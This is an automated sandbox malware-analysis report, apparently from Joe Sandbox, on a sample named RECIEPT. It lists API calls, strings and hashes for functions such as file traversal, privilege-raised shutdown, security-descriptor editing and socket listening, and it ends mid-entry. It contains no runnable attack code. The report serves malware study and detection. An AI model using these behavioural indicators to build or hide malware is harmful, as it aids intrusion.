                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem
                                        • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                        • API String ID: 999945258-2428617273
                                        • Opcode ID: 438ad41bdba169d6dbcdf3912f97c2a8dc3502a0945a742a170651836116907f
                                        • Instruction ID: 8fd0730747e081185947bc4026d2fd3d0a29cbe563c255e8678d3cf3417a7967
                                        • Opcode Fuzzy Hash: 438ad41bdba169d6dbcdf3912f97c2a8dc3502a0945a742a170651836116907f
                                        • Instruction Fuzzy Hash: 32719772204300ABC310EF55CC85FAFB7E9AF88705F504D2FF645962D1E6B9E944875A
                                        APIs
                                          • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                          • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                        • GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                                        • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
                                        • __wsplitpath.LIBCMT ref: 00403492
                                          • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                        • _wcscpy.LIBCMT ref: 004034A7
                                        • _wcscat.LIBCMT ref: 004034BC
                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                          • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                          • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                          • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                          • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,?,0040355C,?,?,?,00000010), ref: 00403B08
                                          • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,00000010), ref: 00403B41
                                        • _wcscpy.LIBCMT ref: 004035A0
                                        • _wcslen.LIBCMT ref: 00403623
                                        • _wcslen.LIBCMT ref: 0040367D
                                        Strings
                                        • Error opening the file, xrefs: 00428231
                                        • #include depth exceeded. Make sure there are no recursive includes, xrefs: 00428200
                                        • _, xrefs: 0040371C
                                        • Unterminated string, xrefs: 00428348
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: _wcslen$ByteCharCurrentDirectoryMultiWide_wcscpystd::exception::exception$Exception@8FullNamePathThrow__wsplitpath__wsplitpath_helper_malloc_memmove_wcscat
                                        • String ID: #include depth exceeded. Make sure there are no recursive includes$Error opening the file$Unterminated string$_
                                        • API String ID: 3393021363-188983378
                                        • Opcode ID: 8f97009b1bf37824170bfd28a55259835aaf6cf29f8ea0c932b2b617a2771f3f
                                        • Instruction ID: 51a390cb75b153cc6cab8b26b712b327f6f81406d0e69f910df9a3585dc9283e
                                        • Opcode Fuzzy Hash: 8f97009b1bf37824170bfd28a55259835aaf6cf29f8ea0c932b2b617a2771f3f
                                        • Instruction Fuzzy Hash: CCD105B1508341AAD710EF64D841AEFBBE8AF85304F404C2FF98553291DB79DA49C7AB
                                        APIs
                                        • FindFirstFileW.KERNEL32(?,?), ref: 00431AAA
                                        • GetFileAttributesW.KERNEL32(?), ref: 00431AE7
                                        • SetFileAttributesW.KERNEL32(?,?), ref: 00431AFD
                                        • FindNextFileW.KERNEL32(00000000,?), ref: 00431B0F
                                        • FindClose.KERNEL32(00000000), ref: 00431B20
                                        • FindClose.KERNEL32(00000000), ref: 00431B34
                                        • FindFirstFileW.KERNEL32(*.*,?), ref: 00431B4F
                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00431B96
                                        • SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 00431BBA
                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 00431BC2
                                        • FindClose.KERNEL32(00000000), ref: 00431BCD
                                        • FindClose.KERNEL32(00000000), ref: 00431BDB
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                        • String ID: *.*
                                        • API String ID: 1409584000-438819550
                                        • Opcode ID: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
                                        • Instruction ID: b696eadadcb8a1627fc7fa6feda0e6e57aab690e04623b9265854ab7309d24dd
                                        • Opcode Fuzzy Hash: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
                                        • Instruction Fuzzy Hash: CE41D8726002046BC700EF65DC45EAFB3ACAE89311F04592FF954C3190E7B8E519C7A9
                                        APIs
                                        • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00431C09
                                        • __swprintf.LIBCMT ref: 00431C2E
                                        • _wcslen.LIBCMT ref: 00431C3A
                                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 00431C67
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: CreateDirectoryFullNamePath__swprintf_wcslen
                                        • String ID: :$\$\??\%s
                                        • API String ID: 2192556992-3457252023
                                        • Opcode ID: e3674d1d1678aa5b2072ca287ea13c599f7f343b69fea712d52b9408e430d9c0
                                        • Instruction ID: 5b8928ca783b893dacbf0721098a8616f59dd17613a34138e213b27d6ec4c177
                                        • Opcode Fuzzy Hash: e3674d1d1678aa5b2072ca287ea13c599f7f343b69fea712d52b9408e430d9c0
                                        • Instruction Fuzzy Hash: EE413E726403186BD720DB54DC45FDFB3BCFF58710F00859AFA0896191EBB49A548BD8
                                        APIs
                                        • GetLocalTime.KERNEL32(?), ref: 004722A2
                                        • __swprintf.LIBCMT ref: 004722B9
                                        • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,0048BF68), ref: 004724EC
                                        • SHGetFolderPathW.SHELL32(00000000,0000002B,00000000,00000000,0048BF68), ref: 00472506
                                        • SHGetFolderPathW.SHELL32(00000000,00000005,00000000,00000000,0048BF68), ref: 00472520
                                        • SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,0048BF68), ref: 0047253A
                                        • SHGetFolderPathW.SHELL32(00000000,00000019,00000000,00000000,0048BF68), ref: 00472554
                                        • SHGetFolderPathW.SHELL32(00000000,0000002E,00000000,00000000,0048BF68), ref: 0047256E
                                        • SHGetFolderPathW.SHELL32(00000000,0000001F,00000000,00000000,0048BF68), ref: 00472588
                                        • SHGetFolderPathW.SHELL32(00000000,00000017,00000000,00000000,0048BF68), ref: 004725A2
                                        • SHGetFolderPathW.SHELL32(00000000,00000016,00000000,00000000,0048BF68), ref: 004725BC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: FolderPath$LocalTime__swprintf
                                        • String ID: %.3d
                                        • API String ID: 3337348382-986655627
                                        • Opcode ID: e729fe0eecd02e77c5ee8deaec4c56456965897f8b2a75efd2bc4ea0d4b88c57
                                        • Instruction ID: 0d137f706e98bab13a4a4c7fcb7914b07bdb7c22a72ec07ab57cd4d47a51df83
                                        • Opcode Fuzzy Hash: e729fe0eecd02e77c5ee8deaec4c56456965897f8b2a75efd2bc4ea0d4b88c57
                                        • Instruction Fuzzy Hash: A6C1EC326101185BD710FBA1DD8AFEE7328EB44701F5045BFF909A60C2DBB99B598F64
                                        APIs
                                        • FindFirstFileW.KERNEL32(?,?), ref: 004428A8
                                        • FindNextFileW.KERNEL32(00000000,?), ref: 0044290B
                                        • FindClose.KERNEL32(00000000), ref: 0044291C
                                        • FindClose.KERNEL32(00000000), ref: 00442930
                                        • FindFirstFileW.KERNEL32(*.*,?), ref: 0044294D
                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 0044299C
                                        • SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 004429BF
                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 004429C9
                                        • FindClose.KERNEL32(00000000), ref: 004429D4
                                          • Part of subcall function 00433C08: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00433C2A
                                        • FindClose.KERNEL32(00000000), ref: 004429E2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                        • String ID: *.*
                                        • API String ID: 2640511053-438819550
                                        • Opcode ID: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
                                        • Instruction ID: 696d482812dd8bff2d9106dd2d2144e175b5fe2258968c3fd44c1969776f6f9a
                                        • Opcode Fuzzy Hash: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
                                        • Instruction Fuzzy Hash: AD410AB2A001186BDB10EBA5ED45FEF73689F89321F50465BFD0493280D6B8DE558BB8
                                        APIs
                                        • GetCurrentProcess.KERNEL32(00000028,?), ref: 004333CE
                                        • OpenProcessToken.ADVAPI32(00000000), ref: 004333D5
                                        • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004333EA
                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 0043340E
                                        • GetLastError.KERNEL32 ref: 00433414
                                        • ExitWindowsEx.USER32(?,00000000), ref: 00433437
                                        • InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?), ref: 00433466
                                        • SetSystemPowerState.KERNEL32(00000001,00000000), ref: 00433479
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: ProcessSystemToken$AdjustCurrentErrorExitInitiateLastLookupOpenPowerPrivilegePrivilegesShutdownStateValueWindows
                                        • String ID: SeShutdownPrivilege
                                        • API String ID: 2938487562-3733053543
                                        • Opcode ID: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
                                        • Instruction ID: ad32a9094aef850e2966724807b7d50af50c82f056daff98c21d8f44207777ad
                                        • Opcode Fuzzy Hash: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
                                        • Instruction Fuzzy Hash: F221C971640205ABF7108FA4EC4EF7FB3ACE708702F144569FE09D51D1D6BA5D408765
                                        APIs
                                          • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00436E45
                                          • Part of subcall function 00436E2B: GetLastError.KERNEL32(?,00000000,?), ref: 00436E4F
                                          • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00436E75
                                          • Part of subcall function 00436DF7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00436E12
                                        • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0044618A
                                        • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 004461BE
                                        • GetLengthSid.ADVAPI32(?), ref: 004461D0
                                        • GetAce.ADVAPI32(?,00000000,?), ref: 0044620D
                                        • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00446229
                                        • GetLengthSid.ADVAPI32(?), ref: 00446241
                                        • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0044626A
                                        • CopySid.ADVAPI32(00000000), ref: 00446271
                                        • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 004462A3
                                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 004462C5
                                        • SetUserObjectSecurity.USER32(?,00000004,?), ref: 004462D8
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                        • String ID:
                                        • API String ID: 1255039815-0
                                        • Opcode ID: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
                                        • Instruction ID: cbecfdc94e872455e881353a2ef69e95113e06a92746e25f2a634f38edc45108
                                        • Opcode Fuzzy Hash: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
                                        • Instruction Fuzzy Hash: C251BC71A00209BBEB10EFA1CD84EEFB778BF49704F01855EF515A7241D6B8DA05CB69
                                        APIs
                                        • __swprintf.LIBCMT ref: 00433073
                                        • __swprintf.LIBCMT ref: 00433085
                                        • __wcsicoll.LIBCMT ref: 00433092
                                        • FindResourceW.KERNEL32(?,?,0000000E), ref: 004330A5
                                        • LoadResource.KERNEL32(?,00000000), ref: 004330BD
                                        • LockResource.KERNEL32(00000000), ref: 004330CA
                                        • FindResourceW.KERNEL32(?,?,00000003), ref: 004330F7
                                        • LoadResource.KERNEL32(?,00000000), ref: 00433105
                                        • SizeofResource.KERNEL32(?,00000000), ref: 00433114
                                        • LockResource.KERNEL32(?), ref: 00433120
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: Resource$FindLoadLock__swprintf$Sizeof__wcsicoll
                                        • String ID:
                                        • API String ID: 1158019794-0
                                        • Opcode ID: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
                                        • Instruction ID: 48d2d5a3af9b637b7fc6f2c6b5a7fdd3517197a5f8dc2ef3994740021b7ed835
                                        • Opcode Fuzzy Hash: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
                                        • Instruction Fuzzy Hash: C741F1322002146BDB10EF65EC84FAB37ADEB89321F00846BFD01C6245E779DA51C7A8
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                        • String ID:
                                        • API String ID: 1737998785-0
                                        • Opcode ID: bc1c5a0e04e7211697dd638385d424d337038878635646daacac479226a8eb74
                                        • Instruction ID: d84b136cee2c902db59abfe4f82a3f409d39725fe24efd6a62fd8a04edebb5dd
                                        • Opcode Fuzzy Hash: bc1c5a0e04e7211697dd638385d424d337038878635646daacac479226a8eb74
                                        • Instruction Fuzzy Hash: 334114726001119FC310EFA5EC89B5EB7A4FF54315F00856EF909EB3A1EB75A941CB88
                                        APIs
                                        • SetErrorMode.KERNEL32(00000001), ref: 0045D627
                                        • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,?), ref: 0045D6B5
                                        • GetLastError.KERNEL32 ref: 0045D6BF
                                        • SetErrorMode.KERNEL32(00000000,?), ref: 0045D751
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: Error$Mode$DiskFreeLastSpace
                                        • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                        • API String ID: 4194297153-14809454
                                        • Opcode ID: 7585e308607772b0055f7746bf91c511cc03d2319b95ee688ecb5d1da683c46d
                                        • Instruction ID: 1f300c266cb1daf6abeae651b696e439ee3a0372042695327ab67fb83666ce96
                                        • Opcode Fuzzy Hash: 7585e308607772b0055f7746bf91c511cc03d2319b95ee688ecb5d1da683c46d
                                        • Instruction Fuzzy Hash: FE418235D00209DFCB10EFA5C884A9DB7B4FF48315F10846BE905AB352D7799A85CB69
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: _memmove$_strncmp
                                        • String ID: @oH$\$^$h
                                        • API String ID: 2175499884-3701065813
                                        • Opcode ID: 988809b36a944a9929e300e154a4cfc85b4d4f50dea7e6e4a67b5f519bc2876c
                                        • Instruction ID: 796dcd1322dc9123c5f4e5533c800aedaabe8dca19c5b95ba0af32eff2573e22
                                        • Opcode Fuzzy Hash: 988809b36a944a9929e300e154a4cfc85b4d4f50dea7e6e4a67b5f519bc2876c
                                        • Instruction Fuzzy Hash: 4242E170E04249CFEB14CF69C8806AEBBF2FF85304F2481AAD856AB351D7399946CF55
                                        APIs
                                        • socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 0046530D
                                        • WSAGetLastError.WSOCK32(00000000), ref: 0046531C
                                        • bind.WSOCK32(00000000,?,00000010), ref: 00465356
                                        • WSAGetLastError.WSOCK32(00000000), ref: 00465363
                                        • closesocket.WSOCK32(00000000,00000000), ref: 00465377
                                        • listen.WSOCK32(00000000,00000005), ref: 00465381
                                        • WSAGetLastError.WSOCK32(00000000), ref: 004653A9
                                        • closesocket.WSOCK32(00000000,00000000), ref: 004653BD
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: ErrorLast$closesocket$bindlistensocket
                                        • String ID:
                                        • API String ID: 540024437-0
                                        • Opcode ID: 56b395d1b7441155ee1d78469f99a9871a9e2360f64803e3ab449944eb02724f
                                        • Instruction ID: 689f190a2b8ca197395c4559ba4ec64c13dad074e2778b61c05f6be918bdb8b0
                                        • Opcode Fuzzy Hash: 56b395d1b7441155ee1d78469f99a9871a9e2360f64803e3ab449944eb02724f
                                        • Instruction Fuzzy Hash: A8319331200500ABD310EF25DD89B6EB7A8EF44725F10866EF855E73D1DBB4AC818B99
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID:
